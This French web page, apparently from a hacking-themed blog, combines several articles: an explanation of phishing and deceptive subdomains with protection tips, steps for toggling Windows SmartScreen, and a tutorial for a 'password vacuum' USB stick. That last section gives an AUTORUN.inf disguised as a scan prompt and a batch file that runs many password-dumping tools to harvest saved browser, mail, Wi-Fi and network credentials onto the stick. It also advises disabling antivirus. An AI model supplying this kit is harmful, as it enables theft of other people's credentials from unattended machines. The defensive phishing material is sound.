Phishing (hameçonnage)

Phishing
En français: hameçonnage
Technique de piratage consistant à faire passer pour un site officiel, imité, un site contenant un formulaire officiel en vue de récupérer des données confidentielles.

Ex: http://www.banquedefrance.com<- Cette adresse, bien qu’ayant l’air de pointer vers le site de la banque de france est en fait redirigée vers -http://forums.cnetfrance.fr, elle pourrait tout aussi bien pointer vers un site imitant celui de votre banque, d’un compte paypal ou n’importe quel site web, très simple à réaliser par un initié. En envoyant un email avec une adresse de ce type, l’internaute piégé croit cliquer sur un lien menant à sa banque mais est redirigé vers un site de même design appartenant à un pirate.

En plus de l’aspect visuel, l’adresse du site web de destination est parfois trompeuse, ce qui entretient la confusion. En effet, grâce aux sous-domaines, il est possible de créer une adresse du type www.banquedefrance.example.com. C’est cette url, telle que vous la voyez, qui s’affichera dans la barre d’adresse du navigateur. Elle appartient pourtant bien au webmaster du domaine example.com et non à celui de la banque de France.

Le propriétaire d’un nom de domaine sur internet a la possibilité de créer une infinité de sous domaines se terminant par le nom de son domaine, exemple, ces url appartiennent toutes au même domaine:

Publicités

Comment se protéger du phishing

Une des attaques les plus à la mode et très dévastatrice est le phishing : qu’est ce que le phishing ?.

Ce nom étrange cache une technique pas toujours simple a comprendre mais surtout facile a éviter. Un utilisateur reçoit un e-mail déguisé de sa banque ou de son magasin en ligne favori contenant un lien vers son compte. Il est demandé une confirmation de mot de passe, une bonne affaire est proposée ou n’importe quelle raison qui pourrait nécessiter de se connecter à un compte en ligne.

Une fois le lien cliqué, l’url dans la barre d’adresse est maquillée et le vrai site cloné sur un serveur différent. Confiant, l’internaute piégé rentre ses identifiants et/ou ses numéros de cartes…etc Le pirate n’a plus qu’a les récupérer et s’en servir.

La première précaution a prendre est de ne jamais cliquer sur les liens contenus dans un e-mail ou sur une page web et menant a un formulaire de paiement ou de connexion. Saisissez l’adresse dans votre navigateur si vous voulez vous assurer d’être vraiment sur le site concerné et créez des raccourcis ou favoris pour accéder à vos services en ligne.

Phishing : un email piégé à la loupe

Le phishing ou hameçonnage est une technique utilisée par les pirates dans le but de récupérer des informations sur les comptes des clients de certaines boutiques ou services en ligne. voici une tentative réelle de phishing analysée ainsi que des conseils sur les moyens de se protéger.

Le titre est court, simple et attire de suite l’attention : « Vous avez un problème sur votre compte Amazon ». Le contenu explique qu’un mystérieux problème a été détecté sur notre compte Amazon (qui n’a pas un compte Amazon ?) et que l’accès a été restreint par sécurité. Nous sommes ensuite invité à cliquer pour résoudre le problème et activer le compte. L’email est simple, sobre et ne contient qu’une faute d’orthographe peu évidente. Le logo Amazon et la barre de décoration type Paypal sont là pour mettre en confiance les habitués des achats en ligne. Pour couronner le tout, l’expéditeur de l’email est service@amazon.fr.

Contrairement aux premiers cas de phishing qui ont fait leur apparition il y a quelques années, celui-ci est bien ficelé. Un piège redoutable dans lequel pourrait tomber de nombreux internautes.

La protection des navigateurs et logiciels de sécurité

Fort heureusement, les éditeurs de logiciels de navigation ont commencé à mettre en place des protections directement dans les navigateurs. Une fois cliqué, le lien n’ouvre pas la page demandée. Au lieu de trouver une imitation de la fenêtre de la connexion au compte Amazon sur un site différent et qui servirait à voler les identifiants de connexion, c’est une page d’avertissement du navigateur qui est proposée.

Firefox et Internet explorer, reliés à une base de données qui relève les sites malveillants, ont tous deux su détecter le site comme un site destiné à voler des informations par la technique du hameçonnage ou Phishing :

Les navigateurs Google Chrome et Opera ont laissé passer la connexion mais au lieu de la fameuse page piégée, nous sommes redirigé vers une page temporaire de l’hébergeur qui a suspendu le domaine en question. Un compte probablement acheté avec une carte bleue dérobée et sous un faux nom. Le pirate a donc déjà été identifié et le risque écarté. Cette campagne de phishing ne causera plus d’ennuis mais combien de temps s’est-il écoulé avant que les protections se mettent en place ? Combien de victimes cet email a-t-il fait ? Il existe bien sûr des indices qui permettent d’identifier que l’email est frauduleux.

Se protéger en analysant le domaine qui s’affiche dans la barre d’adresse

Avant de cliquer, en survolant le lien dans l’email ou une fois sur le site malveillant on peut s’apercevoir que le nom de domaine (l’URL) n’est pas celui d’Amazon. Mais certains nom de domaines et sous domaines complexes peuvent facilement berner un utilisateur en contenant le nom du service visé. En effet par le jeu des sous-domaines il est très simple de créer des domaines très courts de 5 ou 6 lettres et de placer un nom donnant confiance dans la barre d’adresse du navigateur.

Le site amazon.fr qui est le seul site légitime peut également se décliner en sous domaines tels que « http://connexion.amazon.fr &raquo; ou « http://compte.amazon.fr &raquo;. On remarque que le vrai nom de domaine est placé juste avant l’extension finale .fr , il s’agit donc bien du site appartenant à amazon.

Un sous domaine frauduleux peut prendre une forme très proche de ces adresses. Exemple avec le sous domaine « abcfr.com » qui n’appartient pas à Amazon mais que son propriétaire pourrait utiliser pour créer des sous domaines tels que : « http://www.amazon.abcfr.com &raquo; ou « http://compte.amazon.abcfr.com &raquo;. Ces deux sous domaines qui inspirent pourtant confiance ne sont pas des domaines appartenant à Amazon mais des « sous-domaines » du domaine « abcfr.com » .

Vous l’avez compris, seul le mot placé avant l’extension finale désigne le domaine. Internet explorer est un des seuls à mettre en évidence le vrai nom de domaine dans la barre d’adresse :

Cette technique d’identification du domaine est peu évidente pour ceux qui ne sont pas au courant des possibilités offertes par la gestion des noms de domaines sur internet. Les navigateurs et logiciels qui proposent des protections sont efficaces une fois leurs bases mises à jour mais laissent forcément passer les premiers email, les pirates comptent bien utiliser ce laps de temps pour piéger quelques internautes.

Adopter le principe de précaution en accédant aux sites par les favoris

Le moyen le plus sûr de se protéger contre le phishing est donc tout simplement de ne jamais se connecter à un compte important (boutique, banque, email etc…) en cliquant sur un lien depuis un site web ou un email. Pour éviter les manipulations et d’avoir à saisir les adresses manuellement à chaque connexion, l’internaute prudent prendra soin de se constituer une une liste de favoris enregistrés pour accéder à ses principaux services en ligne

Comment activer ou désactiver le filtre SmartScreen de Windows

Très efficaces, les arnaques de type « phishing » se sont multipliées sur internet ces dernières années. Pour tenter de protéger les utilisateurs de Windows et d’Internet Explorer Microsoft a mis en place un filtre dit « SmartScreen ». Ce filtre nous protège lorsque l’on navigue sur internet, pour ne pas se faire escroquer ou télécharger sans le vouloir une menace.

Pour en savoir plus : Comment se protéger du phishing

Pour plusieurs raisons, on peut être amené à le désactiver, une des plus courante est le test de fiabilité d’un antivirus. Voici donc un tutoriel sur comment « Activer » ou « Désactiver » le filtre SmartScreen de Windows.

Une fois sur votre Bureau placez le curseur de votre souris en bas à droite de l’écran, allez ensuite dans « Paramètres »

smart-screen-windows-01

Choisissez ensuite l’éntrée « Modifier les paramètres du PC »

smart-screen-windows-02

Puis cliquez sur l’onglet « Confidentialité »

smart-screen-windows-03

Vous Arrivez alors dans le sous-onglet « Général ». Il ne vous reste qu’a activer ou non le filtre SmartScreen qui s’affiche dans le panneau de droite :

smart-screen-windows-04

Et voilà, vous pouvez fermer la fenêtre en cliquant sur la croix rouge en haut à droite de l’écran/ ou via ALT+F4. Pensez à redémarrer le filtre une fois que vous avez terminé vos tests s’il s’agit d’une mesure temporaire.

En cas de difficulté avec le filtre SmartScreen, demandez de l’aide dans les forums Windows.

Aspirateur de mot de passe

Eh bien c’est très simple : on branche une clé USB à un ordinateur allumé et cette dernière récupère (presque) tous les mots de passes enregistrés sur l’ordinateur.

Cela peut s’avérer bien pratique lorsque vous vous apprêtez à formater votre ordinateurs et que vous voulez récupérer vos mots de passe Firefox, Thunderbird et autres sans y passer une après midi complète.

 

Ce tutoriel est écrit dans un but ludique. Sachez qu’il est illégal d’effectuer ce genre de manip’ sur un ordinateur qui ne vous appartient pas, il s’agit ni plus ni moins de vol. Fire-DIY décline toute responsabilité quant à l’utilisation de ce tutoriel par des personnes mal avisées et vous rappelle que vous êtes responsables de vos actes.

Concrètement, la clé USB embarque une dizaine de petits programmes tous spécialisés dans la capture de mots de passe, chacun pour une application particulière. Par exemple pour msn (qui utilise encore ça ? ^^), Chrome, Internet Explorer …etc. Vous l’aurez compris, c’est très simple d’utilisation mais très puissants (et potentiellement dangereux si on ne verrouille pas sa session…).

Allez, place à la pratique !

 

Etape 1 : Autorun

La première étape consiste à créer un fichier autorun qui va permettre d’automatiser le lancement des programmes dont je vous ai parlé lors de l’insertion du périphérique de stockage, en l’occurrence notre clé USB. A travers ce fichier, nous allons demander à Windows d’exécuter un batch (que nous écrirons à l’étape 2) qui s’occupera de lancer tous les programmes de capture de mot de passe. Ceci permet de n’avoir qu’à brancher la clé USB pour que tout se déroule tout seul.

Ouvrez donc votre éditeur de texte favoris (Notepad++ ou Sublime Text par exemple) et collez-y le bout de code suivant :

[autorun]
open=launch.bat
ACTION=Passer un scan

Enregistrez ce fichier sur votre clé USB sous le nom de « AUTORUN.inf ».

Etape 2 : Le batch

Cette fois ci, nous allons écrire le batch qui va exécuter un à un les programmes de récupération de mots de passe.

Comme pour l’étape précédente, ouvrez votre éditeur de texte et tapez le code suivant :

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt

Ce code est vraiment très simple à comprendre, on démarre un programme avec « start » et on enregistre dans un fichier texte ce qu’il nous renvoie grâce à la commande « /stext ».

Là encore, enregistrez ce fichier sur votre clé USB et nommez-le « launch.bat ».

Etape 3 : Téléchargement des programmes

Maintenant, il faut télécharger les programmes appelés par notre batch (eh oui, sinon rien ne va se lancer).

Voici les liens de téléchargement des différents programmes cités plus hauts :

Ils se présentent sous la forme d’archives ZIP. Décompressez-les et déplacez les exécutables (.exe) à la racine de votre clé USB (là où il y a déjà AUTORUN.inf et launch.bat).

contenu-usb

Votre clé USB est maintenant prête pour utilisation.

Etape 4 : Effectuer un test

Maintenant que notre clé USB est fin prête, nous allons effectuer un petit test pour vérifier que tout fonctionne correctement.

Retirez votre clé en toute sécurité puis rebranchez-là. Si tout se passe bien, une fenêtre d’alerte affichant « Passer un scan » apparaît. Cliquez simplement sur OK pour lancer l’aspirateur de mots de passe. Maintenant rendez-vous sur votre clé. Vous pouvez voir que des fichiers texte sont apparu. Ce sont ces fichiers textes qui contiennent les mots de passe capturés par chaque programme.

passwordfox

Vous n’avez plus qu’à retirer votre clé en toute sécurité pour ne pas perdre les mots de passe sauvegardés.

Je n’ai aucune fenêtre qui s’ouvre lorsque je branche ma clé, comment ça se fait ?

Pas de panique, ça n’est pas ça qui va nous arrêter ! Il arrive en effet que l’autorun soit désactivé pour des raisons de sécurité. Dans ce cas, il vous suffit de vous rendre sur la clé et de double cliquer sur « launch.bat » pour le lancer, c’est tout !

Pensez à désactiver votre antivirus (temporairement bien sûr) si vous ne voulez pas avoir une pop-up d’alerte bloquante qui s’ouvre à chaque exécution d’un programme de capture.

C’est la fin de ce tuto, j’espère qu’il vous aura été utile et que maintenant vous penserez à verrouiller votre session lorsque vous vous absentez.
Pour rappel, le raccourci clavier pour verrouiller Windows est Win + L.

A bientôt sur congo hacking

Aime ma page congo hacking